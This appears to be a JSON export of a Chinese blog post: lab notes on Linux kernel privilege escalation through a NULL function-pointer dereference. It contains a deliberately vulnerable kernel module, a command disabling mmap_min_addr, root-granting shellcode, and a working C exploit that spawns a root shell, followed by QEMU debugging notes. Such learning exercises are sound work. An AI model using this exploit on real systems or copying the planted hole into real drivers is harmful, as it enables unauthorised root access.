{"id":98,"date":"2020-09-08T17:22:47","date_gmt":"2020-09-08T09:22:47","guid":{"rendered":"http:\/\/pareto.fun\/?p=98"},"modified":"2020-11-04T12:52:29","modified_gmt":"2020-11-04T04:52:29","slug":"%e5%86%85%e6%a0%b8%e6%8f%90%e6%9d%83%e5%85%a5%e9%97%a8-null-dereference","status":"publish","type":"post","link":"http:\/\/pareto.fun\/?p=98","title":{"rendered":"\u5185\u6838\u63d0\u6743\u5165\u95e8-null dereference"},"content":{"rendered":"\n

NULL Dereference<\/h1>\n\n\n\n

\u73af\u5883<\/h2>\n\n\n\n

\u5185\u6838\u4ee3\u7801\uff1a4.10.1<\/p>\n\n\n\n

\u6f0f\u6d1e\u4ee3\u7801<\/h2>\n\n\n\n
#include <linux\/init.h>
#include <linux\/module.h>
#include <linux\/kernel.h>
#include <linux\/proc_fs.h>
void (*my_funptr)(void);
int bug1_write(struct file *file,const char *buf,unsigned long len)
{
        my_funptr();
        return len;
}
static int __init null_dereference_init(void)
{
        printk(KERN_ALERT \"null_dereference driver init!n\");
        create_proc_entry(\"bug1\",0666,0)->write_proc = bug1_write;
       return 0;
}
static void __exit null_dereference_exit(void)
{
        printk(KERN_ALERT \"null_dereference driver exitn\");
}
module_init(null_dereference_init);
module_exit(null_dereference_exit);<\/pre>\n\n\n\n
\u5728\u6211\u4f7f\u7528\u7684\u5185\u6838\u7248\u672c create_proc_entry \u5df2\u7ecf\u88abproc_create \u66ff\u6362\uff0c\u6240\u4ee5\u5185\u6838\u7248\u672c4.10.1\u4e2d\uff0c\u4ee3\u7801\u4e3a\uff1a<\/p>\n\n\n\n
#include <linux\/init.h>
#include <linux\/module.h>
#include <linux\/kernel.h>
#include <linux\/proc_fs.h>
void (*my_funptr)(void);
ssize_t bug1_write(struct file * file, const char __user * buff, size_t st, loff_t * loft){
    my_funptr();
    return st;
}
\u200b
static struct file_operations myops = {
    .write = bug1_write
};
\u200b
static int null_dereference_init(void)
{
    printk(KERN_ALERT \"null_dereference driver init!\\n\");
    proc_create(\"bug1\", 0666, 0 , &myops);
    return 0;
}
\u200b
static void null_dereference_exit(void)
{
    printk(KERN_ALERT \"null_dereference driver exit\\n\");
}
\u200b
module_init(null_dereference_init);
module_exit(null_dereference_exit);
MODULE_LICENSE(\"Dual BSD\");
\u200b<\/pre>\n\n\n\n
Makefile<\/p>\n\n\n\n
obj-m := null_dereference.o
KERNELDR := \/home\/pareto\/My_Kernel-4.10.1-master\/
cflags := \"-Wno-err\"
PWD := $(shell pwd)
modules:
    $(MAKE) -C $(KERNELDR) M=$(PWD) modules
modules_install:
    $(MAKE) -C $(KERNELDR) M=$(PWD) modules_install
clean:
    $(MAKE) -C $(KERNELDR) M=$(PWD) clean<\/pre>\n\n\n\n
\u5229\u7528\u7a7a\u51fd\u6570\u6307\u9488\u6307\u54110\u8fd9\u4e2a\u5730\u5740\uff0c\u5728\u7528\u6237\u6001\u4e2d\u5206\u914d\u4ece0\u5f00\u59cb\u7684\u7a7a\u95f4\u5e76\u5199\u5165shellcode\uff0c\u6765\u8fbe\u5230\u4efb\u610f\u5730\u5740\u8c03\u7528\u3002\u5229\u7528\u4e0b\u5217\u51fd\u6570\u5b9e\u73b0\u63d0\u6743\uff1a<\/p>\n\n\n\n
commit_creds ( prepare_kernel_cred (0));<\/pre>\n\n\n\n
\u83b7\u53d6\u63d0\u6743\u51fd\u6570\u7684\u5730\u5740\u3002(\u5173\u95edkaslr)\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"image-20200908164501144\"<\/figure>\n\n\n\n
shellcode:<\/p>\n\n\n\n
xor %eax %eax\ncall 0xc108a7e4\ncall 0xc108a5a6\nret\n<\/pre>\n\n\n\n
\u8e29\u57511<\/strong> \u5185\u6838\u5df2\u7ecf\u4f7f\u7528mmap_min_addr\u4f5c\u4e3a\u7f13\u89e3\u63aa\u65bdmmap_min_addr\u4e3a4096\uff0c\u9700\u8981\u8bbe\u7f6e\u4e0bmmap_min_addr\u3002\n#<\/strong>\u00a0sysctl\u00a0-w\u00a0vm.mmap_min_addr=\"0\"<\/code><\/pre>\n\n\n\n
\u8e29\u57512<\/strong> \u6211\u5229\u7528as\u6307\u4ee4\u5c06\u6c47\u7f16\u6307\u4ee4\u8f6c\u6362\u4e3a\u673a\u5668\u7801 \uff0c\u4f46\u662fas\u6f14\u4e86\u6211\u4e00\u624b\uff0c\u51fa\u73b0\u4e86\u6307\u4ee4\u4e0d\u5bf9\u7684\u60c5\u51b5\u624b\u52a8\u4fee\u6539\u672b\u5c3e\u4e00\u4e2a\u5b57\u8282\u3002<\/p>\n\n\n\n
\"image-20200908170519175\"<\/figure>\n\n\n\n
Exp\uff1a<\/p>\n\n\n\n
#include <stdio.h>
#include <sys\/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys\/mman.h>
#include <string.h>
char payload[30]= \"\\x31\\xc0\\xe8\\xdd\\xa7\\x08\\xc6\\xe8\\x9a\\xa5\\x08\\xc6\\xc3\";
\u200b
int main(void){
    mmap(0,4096, PROT_READ | PROT_WRITE | PROT_EXEC , MAP_FIXED | MAP_PRIVATE |MAP_ANONYMOUS,-1,4096);  
    memcpy(0,payload ,sizeof(payload));
    int fd = open(\"\/proc\/bug1\",O_WRONLY);
    write(fd,\"muhe\",4);
    system(\"\/bin\/sh\");
    return 0;
}
\u200b<\/pre>\n\n\n\n
\u7ec8\u4e8e\u63d0\u6743\u6210\u529f\uff0c\u770b\u4e86\u6559\u7a0b\u8fd8\u628a\u522b\u4eba\u7684\u5751\u91cd\u65b0\u8e29\u4e00\u8fb9\u7684\u4eba\uff0c\u5fc3\u7d2f\u3002<\/p>\n\n\n\n
\"image-20200908164004487\"<\/figure>\n\n\n\n
2.6.32 \u5185\u6838\u8c03\u8bd5\u65ad\u70b9\u5931\u8d25<\/h1>\n\n\n\n
\u6253\u65ad\u70b9\u5931\u8d25\uff0c\u539f\u56e0\u672a\u77e5\u964d\u4e86\u4f18\u5316\uff0c\u52a0\u8f7d\u4e86vmlinux \u5173\u95edkaslr\uff0c\u4e0d\u6653\u5f97\u5177\u4f53\u539f\u56e0\u3002\u56e0\u4e3a\u8c03\u8bd5\u529f\u80fd\u90fd\u6709\u95ee\u9898\u90a3\u4e48\u8fd8\u662f\u9009\u62e9\u4f7f\u75284.10.1\u5185\u6838\u7248\u672c\u3002<\/p>\n\n\n\n
\u8bb0\u5f55\u4e0b\u5931\u8d25\u8fc7\u7a0b\uff0c\u5185\u6838\u7f16\u8bd1\u8fc7\u7a0b\uff0c\u964d\u4f4e\u4f18\u5316\u7b49\u7ea7\u4e3aO1\u3002<\/p>\n\n\n\n
make menuconfig
make <\/pre>\n\n\n\n
busybux \u9759\u6001\u7f16\u8bd1<\/p>\n\n\n\n
\u6839\u6587\u4ef6\u7cfb\u7edf\u5236\u4f5cbusybux\/_install \u76ee\u5f55<\/p>\n\n\n\n
find . | cpio -o --format=newc > ..\/rootfs.img<\/pre>\n\n\n\n
\u542f\u52a8\u547d\u4ee4<\/p>\n\n\n\n
qemu-system-i386 -kernel ~\/Desktop\/linux-2.6.32.1\/arch\/x86\/boot\/bzImage -initrd ..\/rootfs.img -append \"nokaslr\" -S -s<\/pre>\n\n\n\n
\u5206\u6790\u7ed3\u675f\u4f46\u662f\u4e5f\u9057\u7559\u4e86\u4e00\u4e9b\u95ee\u9898<\/p>\n\n\n\n
  1. \u63d0\u6743\u4f7f\u7528\u7684\u51fd\u6570\u662f\u600e\u4e48\u5f97\u5230\u7684 \uff0c\u731c\u6d4b\u7528\u6237\u6001\u51fd\u6570setuid() \u7684\u5185\u6838\u90e8\u5206\u53ef\u4ee5\u5f97\u5230\u7b54\u6848\u3002<\/li>
  2. kaslr \u7684\u53d8\u5316\u65b9\u5f0f\u662f\u600e\u4e48\u6837\uff0c\u5f00\u542fkaslr\u540e\uff0c\u5185\u6838\u5730\u5740\u662fX000000 + base<\/li><\/ol>\n\n\n\n
    https:\/\/devarea.com\/?s=proc_create#.X087lsgza9I<\/a><\/p>
    https:\/\/www.anquanke.com\/post\/id\/85840<\/a><\/p><\/blockquote>\n","protected":false},"excerpt":{"rendered":"
    NULL Dereference \u73af\u5883 \u5185\u6838\u4ee3\u7801\uff1a4.10.1 \u6f0f\u6d1e\u4ee3\u7801 #include < […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[8],"tags":[],"_links":{"self":[{"href":"http:\/\/pareto.fun\/index.php?rest_route=\/wp\/v2\/posts\/98"}],"collection":[{"href":"http:\/\/pareto.fun\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/pareto.fun\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/pareto.fun\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/pareto.fun\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=98"}],"version-history":[{"count":3,"href":"http:\/\/pareto.fun\/index.php?rest_route=\/wp\/v2\/posts\/98\/revisions"}],"predecessor-version":[{"id":156,"href":"http:\/\/pareto.fun\/index.php?rest_route=\/wp\/v2\/posts\/98\/revisions\/156"}],"wp:attachment":[{"href":"http:\/\/pareto.fun\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=98"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/pareto.fun\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=98"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/pareto.fun\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=98"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}